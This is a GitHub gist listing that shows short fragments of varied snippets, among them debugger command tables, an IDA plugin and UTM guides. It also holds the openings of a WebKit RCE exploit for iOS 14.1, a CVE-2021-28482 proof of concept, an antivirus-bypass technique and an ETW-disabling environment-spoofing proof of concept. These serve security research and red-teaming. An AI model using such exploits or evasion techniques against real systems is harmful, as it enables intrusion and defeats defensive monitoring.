Skip to content

Instantly share code, notes, and snippets.

View flatz's full-sized avatar

Aleksei Kulaev flatz

348 followers · 84 following
View GitHub Profile
@rafaelldi
rafaelldi / WinDbg and LLDB commands.md
Last active July 2, 2024 23:10
WinDbg and LLDB commands

Starting

Command WinDbg LLDB
Start windbg {executable} [{args}] lldb {executable} [--args]
Attach windbg -p {pid} lldb --attach-pid {pid}

Symbols and modules

Command WinDbg LLDB
(Re)load symbols lb {module-name} target symbols add {symbol-file-path}
@ujin5
ujin5 / fuck.js
Last active December 17, 2024 05:58
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));
@testanull
testanull / PoC_CVE-2021-28482.py
Created May 2, 2021 11:10
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
@tandasat
tandasat / CheckGuestVmcsFieldsForVmEntry.c
Last active March 29, 2025 09:50
Simulation of checks performed as per 26.3 CHECKING AND LOADING GUEST STATE
/**
* @file CheckGuestVmcsFieldsForVmEntry.c
* @author Satoshi Tanda ([email protected])
* @brief Checks validity of the guest VMCS fields for VM-entry as per
* 26.3 CHECKING AND LOADING GUEST STATE
* @version 0.1
* @date 2021-02-20
*
* @details This file implements part of checks performed by a processor during
* VM-entry as CheckGuestVmcsFieldsForVmEntry(). This can be called on VM-exit
@theevilbit
theevilbit / divide_and_conquer.c
Created January 17, 2021 15:11
Divide and Conquer NextGen AV bypass
/*
This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes.
*/
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include "Commctrl.h"
#include <string>
@dougallj
dougallj / aarch64_amx.py
Last active April 25, 2025 22:23
# IDA (disassembler) and Hex-Rays (decompiler) plugin for Apple AMX
#
# WIP research. (This was edited to add more info after someone posted it to
# Hacker News. Click "Revisions" to see full changes.)
#
# Copyright (c) 2020 dougallj
# Based on Python port of VMX intrinsics plugin:
# Copyright (c) 2019 w4kfu - Synacktiv
@osy
osy / README.md
Last active April 23, 2025 07:26
UTM on Apple M1 Guides

Thanks to the work of @agraf, @KhaosT, @imbushuo, and others, we have Virtualization.framework working on M1 Macs. These [changes][1] have been merged with QEMU v5.2.0 RC3 (will rebase once the final release is out) and integrated with UTM, a brand new QEMU frontend designed in SwiftUI for iOS 14 and macOS 11.

Screenshot

Downloads

@cheadrian
cheadrian / Youtube_Livestream_Parts_download.py
Last active August 13, 2024 16:03
Download Youtube Live streamed video from the start or selected time
#With the help of this script you can download parts from the Youtube Video that is live streamed, from start of the stream till the end
import urllib.request
import os
#E.G: "https://r4---sn-gqn-p5ns.googlevideo.com/videoplayback?expire=1603041842& ..... 2.20201016.02.00&sq="
#The sound link should contain: &mime=audio in it.
#Here's an example from NASA LIVE:
#VIDEO: https://r5---sn-gqn-p5ns.googlevideo.com/videoplayback?expire=1603165657&ei=eQmOX8TeFtS07gO1xLWwDA&ip=79.115.11.159&id=DDU-rZs-Ic4.1&itag=137&aitags=133%2C134%2C135%2C136%2C137%2C160&source=yt_live_broadcast&requiressl=yes&mh=PU&mm=44%2C29&mn=sn-gqn-p5ns%2Csn-c0q7lnsl&ms=lva%2Crdu&mv=m&mvi=5&pl=20&initcwndbps=1350000&vprv=1&live=1&hang=1&noclen=1&mime=video%2Fmp4&gir=yes&mt=1603143920&fvip=5&keepalive=yes&fexp=23915654&c=WEB&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cvprv%2Clive%2Chang%2Cnoclen%2Cmime%2Cgir&sig=AOq0QJ8wRQIgQMnxy1Yk3HLTpqbOGmjZYH1CXCTNx6u6PgngAVGi4EQCIQDWyaye-u_KGyVQ0HRUsyKVaAzyXbmzDqOGVGpIyP7VtA%3D%3D&lspa
@Siguza
Siguza / pallas.sh
Last active April 12, 2025 19:03
newstyle OTA
#!/usr/bin/env zsh
set -e;
set +m; # Job control would've been nice, but manual round robin it is, sigh.
if [ -z "${ZSH_VERSION+x}" ]; then
echo 'Try again with zsh.';
exit 1;
fi;
@xpn
xpn / env_var_spoofing_poc.cpp
Created June 6, 2020 21:25
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43